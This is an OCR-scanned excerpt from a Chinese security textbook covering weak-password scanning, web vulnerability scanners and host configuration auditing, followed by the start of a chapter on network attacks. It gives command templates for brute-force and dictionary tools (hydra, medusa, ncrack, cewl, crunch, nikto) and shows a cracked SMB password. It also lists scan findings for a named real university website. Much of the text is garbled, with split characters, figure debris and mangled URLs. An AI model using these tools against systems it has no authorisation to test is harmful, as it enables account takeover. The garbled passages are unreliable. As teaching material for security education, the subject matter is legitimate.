则 该 字符 串 是 一 个 合法 口令 ,这 种 扫描 方式 称 为 弱 口 令 扫描 。 

扫描 过 程 如 图 4-29 所 示 。@ 首 先 建立 与 目标 系统 的 网 络 连接 ; 四 设置 用 户 列表 文 
件 和 口令 字典 ; @@ 从 用 户 文件 和 口令 字典 中 选择 一 组 用 户 和 口令 ,并 通过 相应 的 网 络 通 


SME Test with 'smbclient 





















一 -| 沁 反 用 用 户 名 

选择 用 户 名 

一 一 | jane | 上 -一 一 骂人 
选择 弱 吕 ( 














4-29 ” 弱 口 令 扫描 流程 
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信 协 议 发 送 认 证 请 求 报 文 给 目标 ; 四 检测 远 端 系统 返回 报 文 信息 ,确定 
功 ; Sia 正确 , 则 结束 ,否则 转 @。 

册 口 令 扫 描 适 用 于 所 有 甘地 几 口令 和 散 列 算法 进行 远程 用 户 认证 的 网 络 服务 ,如 
TELNET FTP、SSH 和 SMB 等 ,扫描 器 只 需要 识别 不 同 网 络 服务 进行 ite 
的 协议 和 散 列 算法 即 可 。 虽 然 所 有 的 端口 扫描 工具 中 都 包含 有 弱 口 令 扫描 模块 ,但 是 
有 专用 的 弱 口 令 扫 描 工具 强大 。 专 用 口令 扫描 工具 有 : 

(1) hydra: 一 个 并 发 执行 的 弱 口 令 扫 描 器 ,速度 极 快 ,而 且 非 常 易于 扩展 ,支持 众多 
协议 ,如 思科 路 由 器 、 各 种 数据 库 .SSH 等 常用 协议 ,并 支持 通过 代理 进行 扫描 , 它 的 图 形 
化 版 本 是 xHydra。 

(2) sparta: 集成 了 Nmap 和 hydra, 拥 有 较 好 的 图 形 界面 ,使 用 十 分 方便 。 

(3) medusa: 与 hydra 类 似 , 也 是 命令 行 形式 的 弱 口 令 扫 描 器 ,不 过 它 支 持 的 模块 没 
有 hydra 多 。 

(4) ncrack: 与 Nmap 同 源 ,是 一 款 专 用 高 速 弱 口令 扫描 器 , 它 同时 支持 暴力 弱 口 令 
扫描 。 

图 4-30 一 图 4-33 分 别 给 出 了 使 用 4 种 工具 针对 主机 192. 168. 2. 101 的 Windows 
享 服务 (SMB) 端 口 445 的 弱 口 令 扫 描 效 果 图 ,使 用 “fguo” 作 为 用 户 名 ,扫描 出 其 口令 为 


“3345”。 


令 尝 试 是 否 成 




















图 4-30 hydra 扫描 效果 图 


Scan | Brute 


1 回 





IP [192.168.2.101 





加 Try blank password 图 Try login as password 图 Loop around users 国 Exit on first valid 
图 Username Username list |_ Browse Foun 
Password | Password list wordlists/nmap.l: Browse Four 











Hydra (http// www.the org/thc-hydra) finished at 2017-03-19 22.35S:08 


图 4-31 ”sparta 扫描 效果 图 
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图 4-32 medusa 扫描 效果 图 


，TELNET，HTTP(S) ， 


Starting Ncrack 6.4ALPHA ( http: 





Discovered credentials on smb: 


图 4-33 ncrack 扫描 效果 图 


弱 口 令 扫 描 要 想 取得 成 功 ,口令 字典 的 好 坏 起 着 至 关 重 要 的 作用 。 除 了 在 信息 收集 
过 程 中 注意 收集 常用 口令 外 ,也 可 以 针对 特定 用 户 的 社会 信息 自动 生成 一 部 口令 字典 , 因 
为 人 们 往往 使 用 自己 相对 熟悉 的 信息 如 姓名 、 年 龄 .生日 .住址 和 电话 等 ,作为 口令 的 组 成 
部 分 。 使 用 这 种 有 针对 性 的 字典 去 尝试 扫描 特定 用 户 的 弱 口 令 时 ,成 功 的 可 能 性 较 大 。 

自动 生成 口令 的 字典 工 多 ,KALI Linux 2. 0 中 收集 了 两 个 字典 工具 : 

(1) cewl: 分 析 网 站 的 主页 ,获取 其 中 的 有 关 信 息 来 生成 口令 字典 ,命令 如 下 : 












cewl - 咽 最 小 单词 长 度 - d 深入 链接 的 层次 -w 生 成 的 字典 文件 名 网 站 链接 


(2) crunch: 它 不 但 提供 多 种 字符 集 组 合 , 也 允许 用 户 自行 定制 字符 串 , 能 生成 满足 
各 种 用 户 需 求 的 字典 ,十 分 灵活 。 





crunch 最 小 长 度 最 大 长 度 -ff 字符 集 文件 字符 集 名 -o 生 成 的 字典 文件 名 

crunch 最 小 长 度 最 大 长 度 自 定义 字符 串 -o 生 成 的 字典 文件 名 

针对 弱 口 令 扫 描 , 安 全 管理 员 可 以 采取 的 防范 措施 主要 包括 : 

(1) 如 果 发 现 一 个 账户 登录 失败 多 次 , 则 对 其 锁定 一 段 时 间 , 通 常设 置 失 败 的 次 数 为 
3 一 10 次 ,以 防止 弱 口 令 扫 描 。 不 过 这 种 方式 有 时 会 阻止 特权 账户 合法 登录 ,因为 系统 把 
该 账户 锁定 了 。 


<D 
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(2) 设置 高 强度 口令 ,最 好 是 数字 、 大 小 写字 母 ,标点 符号 和 特殊 字符 的 随意 组 合 , 长 
度 至 少 8 位 ,同时 不 要 包含 有 用 户 信 息 的 元 素 , 如 姓名 、 生 日 、 所 在 城市 等 ,减少 口令 出 现 
在 字典 中 的 概率 。 

(3) 注意 保护 口令 的 物理 安全 ,不 要 写 在 纸 质 媒介 上 或 电子 文件 中 ,容易 遗失 或 被 
盗 ; 如 果 一 定 要 记录 在 电子 文件 中 ,应 该 采用 高 强度 加 密 方式 存储 。 


4.5 Web 漏洞 扫描 


随 着 Web 2.0、 社 交 网 络 , 微 博 等 新 型 互联 网 产品 的 诞生 ,基于 Web 环境 的 互联 网 应 
用 越 来 越 广泛 ,在 企业 信息 化 的 过 程 中 ,各 种 应 用 都 架设 在 Web 平台 上 , 接 哑 而 至 的 就 是 
Web 安全 威胁 的 凸显 。 攻 击 者 利用 Web 服务 器 程序 和 Web 应 用 程序 的 漏洞 可 以 得 到 
Web 服务 器 的 控制 权限 或 攻击 访问 Web 程序 的 客户 主机 。 所 以 Web 漏洞 扫描 得 到 了 安 
全 领域 的 广泛 重视 ,几乎 所 有 的 漏洞 扫描 工具 都 集成 Web 扫描 模块 。 

开源 Web 应 用 安全 项 目 (Open Web Application Security Project,OWASP)2013 年 
公布 的 十 大 安全 漏洞 分 别 是 : 

(1) 注入 缺陷 ,包括 SQL ,操作 系统 和 LDAP 注入 。sql、os 和 ldap 注入 缺陷 出 现在 
不 受信 任 的 外 部 输入 被 当 作 命令 的 一 部 分 或 查询 的 一 部 分 ,精心 构造 的 恶意 数据 可 以 利 
用 解释 器 远程 执行 命令 或 访问 未 经 授权 的 数据 。 

(2) 错误 的 鉴别 与 会 话 管理 。Web 程序 中 有 关 验 证 和 会 话 管理 的 功能 没有 正确 实 
现 ,使 得 攻击 者 能 够 绕 过 口令 、 密 钥 或 会 话 令 牌 等 认证 方式 ,冒充 合法 用 户 身份 。 

(3) 跨 站 脚本 漏洞 (Cross Site Script,XSS) 。XSS 使 得 攻击 者 能 够 在 客户 的 浏览 器 
中 执行 脚本 ,可 以 劫持 用 户 会 话 或 者 将 用 户 重 定向 到 其 他 恶意 网 站 。 

(4) 不 安全 的 直接 对 象 访问 。 错 误 地 公开 了 本 来 用 于 内 部 实现 的 对 象 访问 ,例如 口 
令 文件 ,敏感 目录 或 关键 数据 库 等 ,攻击 者 可 以 直接 下 载 这 些 对 象 以 访问 未 经 授权 的 
数据 。 

(5) 安全 配置 错误 。Web 程序 需要 有 一 个 安全 的 配置 定义 和 部 署 方法 ,需要 对 应 用 
程序 \ 应 用 框架 、 应 用 服务 器 、Web 服务 器 .数据库 服务 器 和 操作 系统 平台 等 各 种 组 件 综 
合 配 置 ,而 配置 容易 发 生 错误 。 

(6) 敏感 数据 泄露 。 许 多 应 用 程序 不 能 正确 保护 敏感 数据 ,如 信用 卡 、 税 务 识别 号 和 
身份 验证 凭据 等 。 攻 击 者 可 能 会 窃取 或 修改 这 些 未 受 保护 的 数据 进行 信用 卡 诈 骗 、 身 份 
盗窃 或 其 他 犯罪 行为 。 

(7) 遗漏 功能 级 访问 控制 。 大 多 数 Web 应 用 程序 在 UI 中 展现 某 种 功能 之 前 ,会 设 
置 相应 的 访问 权限 控制 ,但 是 应 用 程序 必须 在 服务 端 设置 同样 的 访问 控制 权限 以 防止 攻 
击 者 伪造 请 求 ,使 用 未 经 授权 的 功能 。 

(8) 跨 站 请 求 伪造 (Cross Site Request Forgery,CSRF) 。 此 类 缺陷 允许 攻击 者 登录 
客户 浏览 器 发 送 一 个 HTTP 请 求 给 Web 应 用 程序 ,以 获取 客户 的 会 话 Cookie 和 任何 其 
他 身份 验证 信息 。 攻 击 者 可 以 强制 客户 浏览 器 生成 请 求 , 使 得 Web 应 用 程序 认为 该 请 求 
是 客户 的 合法 请 求 。 
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(9) 使 用 存在 已 知 漏洞 的 组 件 。 例 如 ,有 漏洞 的 数据 库 服 务 器 .应 用 框架 和 其 他 软件 
模块 ,这 些 模块 几乎 都 拥有 最 高 执行 权限 ,基于 此 类 漏洞 的 攻击 可 以 导致 数据 丢失 或 服务 
器 被 控制 。 

(10) 未 验证 的 。 对 用 户 的 输入 
网 站 的 应 用 程序 。 攻 击 者 可 以 将 合法 用 户 请 求 
攻击 网 站 的 用 户 。 

针对 这 些 Web 程序 漏洞 ,当前 存在 很 多 专用 的 Web 漏洞 扫描 工具 ,包括 商业 版 本 和 
开源 版 本 ,分 别 有 一 些 经 典 的 代表 性 工具 。 

商业 版 本 的 工具 主要 有 : 

(1) Accunetix: 来 自 马耳他 的 专业 Web 程序 漏洞 扫描 产品 ,在 扫描 SQL 注入 和 
XSS 漏洞 方面 十 分 先进 ,能 够 检测 基于 AJAX 的 客户 端 单 页 应 用 (Single Application 
Page,SPA) 的 各 种 漏洞 , 它 同 时 提供 在 线 扫描 服务 

(2) Appscan: IBM 出 品 的 Web 漏洞 扫描 工具 ,在 Web 程序 的 整个 开发 周期 都 提供 
安全 测试 ,可 以 扫描 许多 常见 的 漏洞 ,如 XSS、HTTP 响应 拆 分 漏洞 .参数 算 改 、 隐 式 字段 
处 理 等 。 

(3) N-STALKER: 一 款 商 业 级 的 Web 服务 安全 扫描 程序 (原名 N-Stealth ) ， 
费 的 Web 扫描 程序 如 Nikto 等 的 升级 频率 更 高 ,号 称 含 有 30 000 个 漏洞 和 漏洞 程序 ， 

要 为 Windows 平台 提供 扫描 服务 

开源 免费 的 Web 漏洞 扫描 工具 非常 多 ,下 面 列 表 是 KALI Linux 2.0 版 本 中 集成 的 
重要 工具 ， 

(1) Nikto: 主要 对 Web 服务 器 程序 进行 已 知 漏洞 扫描 , 它 可 以 对 Web 服务 器 的 多 
个 问题 (包括 潜在 的 危险 文件 /CGI、 多 个 服务 器 版 本 的 特定 问题 ) 进 行 全 面 扫描 ,同时 也 
集成 了 一 些 著名 的 Web 程序 漏洞 扫描 插件 。 图 4-34 给 出 了 检测 江西 师范 大 学 计算 机 
信息 工程 学 院 主 页 “jsjxy. jxnu. edu. cen” 使 用 的 Web 服务 器 的 结果 报告 。 常 用 命令 格 
式 为 ; 








做 验证 ,直接 将 用 户 请 求 重 定向 到 其 他 
定向 到 网 络 钓 鱼 或 恶意 网 站 ,从 而 间接 















图 4-34 ”Nikto 扫描 结果 
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nikto - host {主机 名 或 IP} - Tuning { 扫 描 模 块 数字 编号 } [ - output 保存 输出 的 文件 路 径 ] 

nikto 一 update // 更 新 插件 

(2) Golismero: 基于 Python 开发 的 开源 Web 漏洞 扫描 框架 ,除了 自行 开发 的 插件 ， 
还 集成 了 其 他 的 工具 如 Nikto、theharvester、sqlmap 和 OpenVAS 等 。 也 可 以 导入 其 他 工 
具 的 扫描 结果 ,与 自己 的 扫描 结果 结合 并 分 析 , 需 要 对 不 同 的 工具 进行 参数 定制 并 配置 需 
要 调用 的 各 种 模块 , 以 获得 需要 的 结果 ,默认 通过 “/usr/share/golismero/golismero. 
conf” 文 件 进行 配置 。 

(3) VEGA: Subgraph 公司 出 品 的 开源 Web 程序 安全 测试 平台 ,可 以 有 效 验 证 SQL 
注入 、XSS、 敏 感 信息 泄露 和 其 他 一 些 安全 漏洞 ,使 用 十 分 简单 ,基于 Java 编写 并 可 以 在 
各 种 平台 下 运行 。 图 4-35 给 出 了 扫描 “jsjxy. jxnu. edu. cn 的 结果 报告 ,可 能 存在 几 个 高 
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图 4-35 VEGA 扫描 结果 


(4) skipfish: 谷歌 公司 出 品 的 开源 Web 程序 评估 软件 ,与 Nikto 和 OpenVAS 等 其 
他 开源 扫描 工具 有 相似 的 功能 ,但 它 有 一 些 独特 的 优点 ,如 占用 较 低 的 CPU 资源 、 运 行 
速度 比较 快 、 每 秒 钟 可 以 轻松 处 理 2000 个 请 求 , 同 时 误 报 率 较 低 。 它 的 2. 10 版 支持 多 达 
16 种 漏洞 扫描 模块 (图 4-36) ,扫描 “jsjxy. jxnu. edu. cn” 的 结果 报告 如 图 4-36 所 示 ,平均 
每 秒 钟 发 送 将 近 900 个 请 求 ,发现 了 2 个 中 危 漏洞 ,其 详细 扫描 报告 如 图 4-37 所 示 。 





(a) (b) 


图 4-36 ”skipfish 的 支持 模块 和 扫描 效果 
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Crawl results - click to expand: 





中 http:/jsjxy.jxnu.edu.cn! ©@2 @10 ®®12 


Code: 200, length- 62869, declared: texthtml, detected: appiicationybinary, charset- UTF-8 [ show trace +] 


Document type overview - click to expand: 





aa| application/binary (1) 
9 application/xhtml+xml (2) 
[可 text/html (2) 





Issue type overview - click to expand: 





Incorrect caching directives (higher risk) (1) 
XSS vector in document body (1) 

Incorrect or missing MIME type (low risk) (2) 
Hidden files / directories (6) 


1. httpi/isixyxnu.edu.cn/cgi-bin/printenv/ [ show race +] 

, httpi//jsixy.xnu.edu.cn/cgi-bin/.htaccess [ show trace +] 

. http/sxy.xnu.edu.cn/controVF CKeditor/editor/plugins/ [ show wace +] 
,httpi//sxyJxnu.edu.cn/errorjsp | show race +] 
,http:/isixy.xnu.edu.cn/main.htm | show vace +] 

6. http:/isxynu.edu.cnimanage [show race +] 

Server error triggered (1) 

Resource not directly accessible (3) 


图 4-37 skipfish 的 详细 扫描 报告 
(5) sqlmap: Python 编写 的 开源 工具 ,专用 于 扫描 和 利用 SQL 注入 漏洞 ,功能 极其 
强大 ,目前 是 扫描 SQL 注入 漏洞 的 最 佳 开源 软件 。 


(6) W3af: Web 程序 攻击 和 评估 工具 ,完全 由 Python 编写 ,有 超过 1300 个 的 插件 ， 
最 新 版 本 是 1. 6。 


四 四 @@ 
AON 


© 


4.6 系统 配置 扫描 


系统 配置 扫描 是 基于 被 动 式 策略 的 扫描 ,也 称 为 基于 主机 的 扫描 ,主要 是 检测 主机 上 
是 否 存在 配置 错误 或 者 不 符合 预定 义 的 安全 策略 的 配置 ,通常 需要 有 管理 员 权限 才能 执 
行 此 类 扫描 。 

Windows 系统 配置 主要 通过 控制 面板 、 注 册 表 编辑 器 或 设置 组 策略 了 (Group Policy) 
完成 。 组 策略 (图 4-38) 是 管理 员 为 用 户 和 计算 机 定义 并 控制 程序 、 网 络 资源 及 操作 系统 
行为 的 主要 工具 , 它 将 系统 重要 的 配置 功能 汇集 成 各 种 配置 模块 , 供 管理 人 员 直 接 使 用 ， 
从 而 达到 方便 管理 计算 机 的 目的 。 使 用 组 策略 编辑 器 可 以 设置 各 种 软件 .计算 机 和 用 户 
策略 ,可 以 使 用 命令 “gpedit. msc” 或 通过 控制 面板 开启 组 策略 编辑 器 。 

Windows 的 配置 扫描 较为 通行 的 做 法 是 : 

(1) 由 于 当前 组 策略 通常 在 Windows 提供 的 策略 模板 上 进行 修改 而 成 ,所 以 扫描 时 


四 Windows 7 的 专业 版 .旗舰 版 和 企业 版 有 组 策略 ,家 用 版 没有 组 策略 设置 。 


Sa/ 网 络 攻防 技术 与 实战 一 一 深入 理解 信息 安全 防护 体系 


文 作 (P。 振作 (A) ”下 看 (V) 帮助 (H) 
名 中 | 证 园 | 吾 | 罩 画 | 了 











国 Internet Explorer 

国 Microsoft 管理 控制 台 

回 NetMeeting 

国 Rss 源 

国 Tablet PC 

国 windows Anytime Upgrade 

国 Windows Installer 

国 windows Mail 

国 windows Media Player 

国 Windows Messenger 

国 Windows SideShow 

国 Windows Update 

国 Windows 错误 报告 

国 Windows 痘 录放 项 

国 Windows 日 历 

‘ 
[ms | 




















图 4-38 组 策略 编辑 器 效果 图 


可 以 将 修改 后 的 策略 导出 ,与 预先 导出 的 原始 模板 策略 进行 比较 ,检查 是 否 有 配置 错误 的 
地 方 。 

(2) 将 组 策略 或 注册 表 中 的 所 有 配置 导出 ,获得 其 对 应 的 注册 表 键 值 , 然 后 根据 安 
全 需求 编写 相应 脚本 程序 ,检查 对 应 的 键 值 是 否 与 预期 一 致 ,不 一 致 则 可 能 是 配置 
错误 。 

(3) Windows 7 提供 了 一 个 命令 行 工具 auditpol. exe( 图 4-39) ,可 以 检测 和 修改 每 个 
用 户 的 审核 策略 ,如 果 要 查看 某 个 具体 用 户 的 审核 策略 ,可 以 输入 "auditpol /get /user: 
用 户 名 /category: * ”。 


:Users\yangyangYauditpol 
法 : AuditPol commana [Csub-connand>Coptions>] 





Sy 
pp 《每 次 执行 仅 允许 会 个 


2 
/get Pe 时 审 ， 想 > 

/set 和 三 

/list TO] 和 元 素 。 
人 
eentors 其 请 个 入 文件 还 原 。 
/renove 出 用 的 和 用户 市 可 。 
/resourceSACL 全 局 资源 sacl 





关 每 个 命令 的 详细 信息 ， 请 使 用 huditPol 《connand> /二 





4-39 auditpol. exe 用 法 
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Linux 或 UNIX 系统 需要 扫描 的 配置 通常 包括 : 

(1) 所 有 的 安全 补丁 是 否 已 经 安装 完毕 。 

(2) 是 否 是 弱 口 令 。 

(3) IP 协议 栈 的 参数 配置 是 否 正确 ,如 是 否 需 要 IP 转发 等 。 

(4) 敏感 文件 和 目录 的 访问 权限 设置 是 否 正确 。 

(5) 本 地 应 用 程序 如 httpd. conf、sshd. conf 等 配置 是 否 正 确 。 

(6) 其 他 安全 问题 ,如 是 否 开启 不 安全 的 服务 .mount 选项 是 否 设置 不 合理 等 。 

有 许多 自动 化 的 工具 和 脚本 可 以 用 来 审计 Linux 和 UNIX 下 的 各 项 配置 , 较 著 名 的 
安全 审计 工具 包括 ， 

(1) Auditd: Linux 下 的 开源 安全 审计 服务 ,默认 情况 下 ,该 服务 审计 某 些 类 型 的 安 
i 件 ,如 程序 执行 、 系 统 登录 、 账 户 修改 和 认证 事件 等 。 它 能 对 系统 进行 全 面 审 计 ， 
要 配置 审计 规则 ,所 有 规则 在 3 “ /etc/audit/audit. rules” 中 。 它 支持 大 量 审计 
4 ,包括 : 追踪 任何 进入 或 退出 的 系统 调用 ; 加 监控 文件 内 容 和 元 数据 的 













(2) Tripwire: 一 种 数据 完整 性 监测 工具 。 它 不 能 防御 攻击 或 者 阻止 对 文件 的 修改 ， 
但 是 它 可 以 监测 哪些 文件 被 修改 过 。 其 原理 是 将 当前 的 系统 配置 和 文件 状态 映射 为 数据 
库 , 如 果 某 个 文件 或 配置 被 增加 、 删 除 或 修改 ,将 系统 当前 状态 与 数据 库 进行 比较 即 可 发 
现 异常 。 

(3) Lynis: 一 个 开源 安全 审计 工具 ,主要 用 于 加 固 Linux 和 UNIX 系统 。 它 依据 已 
有 的 安全 配置 标准 ,执行 非常 多 的 安全 配置 测试 以 检测 可 能 的 配置 缺陷 ,并 生成 一 份 安全 
险 测 报告 (/var/log/lynis. log) 供 管理 员 参 考 ,其 报告 格式 如 图 4-40 所 示 。 








图 4-40 Lynis 的 部 分 检测 报告 


(4) UNIX-privesc-check: 专门 检测 是 否 存 在 错误 配置 使 得 本 地 用 户 可 以 提升 访问 
权限 的 开源 审计 工具 ,适用 于 Linux 和 UNIX 系统 。 它 是 一 个 Shell 脚本 ,可 以 以 普通 用 
户 或 管理 员 身 份 运行 ,十 分 方便 ,其 使 用 说 明 如 图 4-41 所 示 。 


YXCD 


DD 
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图 4-41 UNIX-privesc-check 说 明 
4.7 小 结 


扫描 分 为 基于 主机 和 基于 网 络 的 扫描 。 基 于 网 络 的 扫描 也 称 为 主动 式 策略 的 扫描 ， 
根据 扫描 目的 的 不 同 ,扫描 方法 包括 : 

(1) 端口 扫描 : 在 10 种 端口 扫描 方法 中 ,只 有 全 连接 扫描 和 半 连 接 扫 描 可 以 返回 可 
靠 的 结果 ,其 他 扫描 都 与 系统 实现 相关 ,扫描 时 可 以 采用 假冒 的 方法 来 躲避 防御 软件 的 
检测 。 

(2) 类 型 和 版 本 扫描 : 包括 服务 扫描 和 操作 系统 扫描 。 服 务 扫描 可 以 使 用 相应 服务 
的 客户 端 工 具 如 telnet、rpcinfo 等 ,或 者 专用 服务 扫描 工具 如 Metasploit 下 的 功能 模块 或 
者 Nmap 中 的 “-sV” 选 项 ,判定 远 端 服务 的 具体 版 本 和 类 型 信息 。 操 作 系 统 扫 描 基 于 不 
同系 统 对 TCP/IP 协议 栈 的 实现 细节 不 同 , 发 送 一 系列 的 探测 报 文 ,根据 返回 的 结果 ,对 
比 已 有 的 协议 栈 “ 指 纹 ” 来 判定 目标 系统 类 型 ,常用 的 指纹 选项 包括 FIN 探测 、TCP ISN、 
TCP 窗口 .DF 标志 、TOS 域 .IP 碎片 和 TCP 选项 。 

(3) 漏洞 扫描 : 漏洞 分 为 操作 系统 漏洞 .应 用 程序 漏洞 和 配置 漏洞 等 ,漏洞 扫描 通常 
结合 漏洞 数据 库 和 插件 方式 两 种 技术 实现 。 现 有 的 较 好 开源 工具 是 OpenVAS, 应 该 熟 
练 掌握 其 使 用 方法 ,定期 对 系统 和 网 络 进行 漏洞 扫描 ,提升 安全 性 。 

(4) 弱 口 令 扫 描 : 基于 口令 字典 ,针对 特定 服务 ,按照 相应 协议 逐个 尝试 可 能 的 口 
令 , 根 据 返 回 值 确定 口令 是 否 匹配 成 功 。 口令 字 典 可 以 是 从 互联 网 上 收集 的 人 们 常用 的 
单词 列表 ,也 可 以 根据 自动 工具 如 crouch 来 生成 与 特定 用 户 信息 有 关 的 口令 字典 。 

(5) Web 漏洞 扫描 : Web 程序 最 主要 的 漏洞 是 OWASP 在 2013 年 公布 的 十 大 安全 
漏洞 ,所 有 的 漏洞 扫描 工具 都 集成 了 该 模块 .但 是 功能 不 如 专业 的 Web 扫描 工具 。 较 好 
的 商业 扫描 工具 是 Accunetix 和 Appscan, 较 好 的 开源 扫描 工具 有 Nikto、VEGA、 
skipfish 和 sqlmap。 

系统 配置 扫描 是 基于 主机 的 扫描 ,也 称 作 被 动 式 策略 扫描 ,主要 是 扫描 与 安全 策略 不 
符 的 配置 选项 。Windows 主要 通过 注册 表 和 组 策略 完成 .需要 编写 相应 的 脚本 逐 项 比 


























第 4 章 ， 网 络 扫描 四 二 


对 。Linux 和 UNIX 下 存在 不 少 自动 工具 可 以 扫描 不 同类 型 的 配置 ,如 Lynis 和 Auditd 
就 是 两 个 全 面 的 配置 审计 工具 ,而 UNIX-privesc-check 则 是 专用 于 扫描 是 否 存 在 提升 本 
地 用 户 权 限 的 配置 。 


习 题 


4-1 详细 叙述 10 种 端口 扫描 方式 ,其 中 哪 几 种 扫描 结果 是 可 靠 的 ? 

4-2 ”服务 扫描 的 结果 是 什么 ? 有 什么 作用 ? 

4-3 ”使 用 Nmap 扫描 内 网 ,检测 哪些 主机 开放 了 80 和 445 端口 ,并 探 明 其 服务 版 本 
和 服务 类 型 。 

4-4 从 Nmap 的 操作 系统 指纹 数据 库 中 分 析 Windows 7 专业 版 和 Windows 10 专 
业 版 的 协议 栈 实现 有 什么 区 别 。 

4-5 假设 内 网 中 的 所 有 主机 都 启用 了 个 人 防火 墙 , 防 火 墙 允 许 网 络 共享 访问 并 且 不 
拒绝 对 800 一 900 端口 的 访问 ,请 给 出 一 种 方法 , 找 出 内 网 中 有 哪些 运行 Windows 7 系统 
的 主机 在 线 。 

4-6 安装 使 用 OpenVAS, 并 用 其 扫描 内 网 中 某 台 主 机 ,给 出 扫描 报告 ,检测 是 否 存 
在 可 利用 的 漏洞 。 

4-7 尝试 使 用 sparta 或 medusa 分 别 对 一 台 Windows 主机 和 Linux 主机 进行 弱 口 
令 扫描 ,测试 administrator 和 root 账号 的 口令 是 否 有 足够 强度 。 

4-8 尝试 使 用 skipfish 或 VEGA 对 学 校 某 台 Web 服务 器 进行 安全 评估 ,检测 是 否 
有 可 利用 的 漏洞 。 

4-9 导出 本 地 Windows 主机 的 当前 策略 ,检测 其 与 各 个 安全 模板 策略 的 差异 。 

4-10 使 用 Lynis 或 Auditd 对 你 的 Linux 主机 进行 一 次 配置 检查 ,检测 是 否 有 安全 
警报 。 


女生 5 音 


网 络 攻击 


学 习 要 求 : 

。 熟练 掌握 各 种 口令 破解 技术 的 基本 原理 ,掌握 各 种 破解 工具 的 使 用 方法 。 

。 掌握 各 种 中 间 人 攻击 技术 的 基本 原理 ,掌握 相应 攻击 工具 的 使 用 方法 和 技巧 。 
掌握 恶意 代码 常用 的 生存 技术 和 隐藏 技术 的 基本 原理 ,学 会 制作 变形 代码 ,理解 
木马 的 功能 。 

掌握 各 种 漏洞 破解 技术 的 基本 原理 ,学 会 使 用 Metasploit 利用 漏洞 攻击 远程 
目标 。 

掌握 DoS/DDoS 攻击 的 基本 原理 ,了 解 各 种 工具 的 实现 原理 ,学 会 使 用 这 些 工具 
展开 DDoS 攻击 。 


通过 信息 收集 和 网 络 扫描 收集 到 足够 的 目标 信息 后 ,攻击 者 即 可 开始 实施 网 络 攻击 
(或 网 络 人 侵 ) 。 攻 击 的 目的 一 般 分 为 信息 泄露 .完整 性 破坏 .拒绝 服务 和 非法 访问 4 种 基 
本 类 型 ,攻击 的 方式 主要 包括 口令 破解 ,中间人 攻击 、 恶 意 代码 攻击 、 漏 洞 破解 ,拒绝 服务 
攻击 等 。 

信息 泄露 指 攻击 者 的 目标 是 窃取 目标 系统 中 的 重要 文件 或 数据 ,如 用 户 资料 .商业 合 
同 、. 军 事 机 密 、 科 技 情报 .金融 账号 等 敏感 和 机 密 信息 。 完 整 性 破坏 指 攻击 者 的 目标 是 筑 
改 或 删除 目标 系统 的 敏感 文件 数据 库 系统 或 重要 数据 ,从 而 获取 经 济 利益 或 制造 混乱 
等 。 拒 绝 服务 攻击 也 是 破坏 性 攻击 , 指 攻 击 者 的 目标 是 占 满 服 务 器 的 所 有 服务 线程 或 者 
网 络 带宽 ,导致 正常 的 服务 请 求 无 法 得 到 响应 ,使 得 服务 器 处 于 瘫痪 状态 ,无 法 正常 提供 
服务 。 非 法 访问 指 攻 击 者 的 目标 是 绕 过 系统 的 访问 控制 策略 ,非法 获取 系统 的 访问 权限 ， 
从 而 可 以 进一步 访问 敏感 网 络 资源 .窃取 信息 、 破 坏 完整 性 ,间接 攻击 其 他 目标 系统 等 。 

口令 破解 指 通过 网 络 监听 、 弱 口令 扫描 、 社 会 工程 学 或 暴力 破解 等 各 种 方式 非法 获取 
目标 系统 用 户 账号 和 口令 ,然后 可 以 冒充 该 合法 用 户 非 法 访问 目标 系统 。 中 间 人 攻击 
(Man in the Middle,MITM) 拦 截 正 常 的 网 络 通信 数据 并 进行 数据 算 改 和 嗅 探 ,而 通信 双 
方 却 毫 不 知情 ,因此 也 称 为 欺骗 攻击 。 单 纯 地 嗅 探 数据 属 于 网 络 监听 和 被 动 攻击 , 算 改 数 
据 则 属于 主动 攻击 。MITM 的 关键 在 于 如 何 秘密 介入 通信 双方 的 传输 路 径 , 在 当前 的 交 
换 式 局 域 网 内 ,可 以 实现 数据 监听 的 方法 有 站 表 溢出 .ARP 欺骗 ,DHCP 欺骗 和 ICMP 路 
由 重 定 向 等 ,后 面 三 种 方法 也 可 以 被 用 于 数据 自 改 。MITM 的 常见 攻击 方法 包括 DNS 
欺骗 .Web 欺骗 等 。 在 广域网 上 实现 MITM ,攻击 者 必须 控制 路 径 中 的 某 个 中 间 节 点 ,或 
者 欺骗 某 个 交换 节点 接收 虚假 路 由 ,从 而 使 报 文通 过 错误 的 路 由 传递 给 攻击 者 ,攻击 者 才 
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可 能 截获 双方 的 报 文 进 而 自 改 报 文 实施 攻击 。 


恶意 代码 是 指 未 经 授权 认证 并 且 可 以 破坏 系统 完整 性 的 程序 或 代码 ,恶意 代码 攻击 
则 是 指 将 恶意 代码 隐蔽 传送 到 目标 主机 ,并 可 远程 执行 未 经 授权 的 操作 ,从 而 实施 信息 窃 
取 、 信 息 自 改 或 其 他 破坏 行为 。 常 见 的 攻击 方式 包括 网 络 病毒 ,网络 蠕虫 .木马 攻击 、 后 门 
攻击 和 恶意 脚本 等 。 

漏洞 破解 是 指 利用 硬件 .软件 .协议 的 具体 实现 或 系统 安全 策略 上 存在 的 缺陷 ,编写 
利用 该 缺陷 的 破解 代码 和 破解 工具 ,实施 远程 攻击 目标 系统 或 目标 网 络 , 这 是 最 主流 的 主 
动 攻击 方式 。 由 于 人 工 编写 程序 时 无 法 保证 程序 百分之百 正确 ,因此 安全 漏洞 无 法 避免 。 
最 新 发 现 的 漏洞 称 为 “ 零 日 "(Zero Day) 漏 洞 , 攻 击 者 如 果 在 安全 厂商 发 布 安全 补丁 之 前 
开发 出 破解 程序 ,就 可 以 轻松 攻击 存在 漏洞 的 远程 目标 。 

拒绝 服务 攻击 (Denial of Service,DoS) 通 常 指 造 成 目标 无 法 正常 提供 服务 的 攻击 ,可 
能 是 利用 TCP/IP 协议 的 设计 或 实现 的 漏洞 ,利用 各 种 系统 或 服务 程序 的 实现 漏洞 造成 
目标 系统 无 法 提供 正常 服务 的 攻击 ,也 可 能 是 通过 各 种 手段 消耗 网 络 带 宽 及 目标 的 系统 
资源 如 CPU 时 间 、 磁 盘 空 间 、 物 理 内 存 等 使 得 目标 停止 提供 正常 服务 的 攻击 。 常 见 的 
DoS 攻击 主要 分 为 带宽 攻击 .协议 攻击 和 好 辑 攻击 。 分 布 式 拒绝 服务 攻击 (Distributed 
Denial of Service,DDoS) 指 多 个 攻击 源 同 时 向 单一 目标 发 起 相同 的 DoS 攻击 ,也 称 为 协 
同 DoS 攻击 ,使 得 目标 很 快 陷于 瘫痪 。 


5.1 口令 破解 


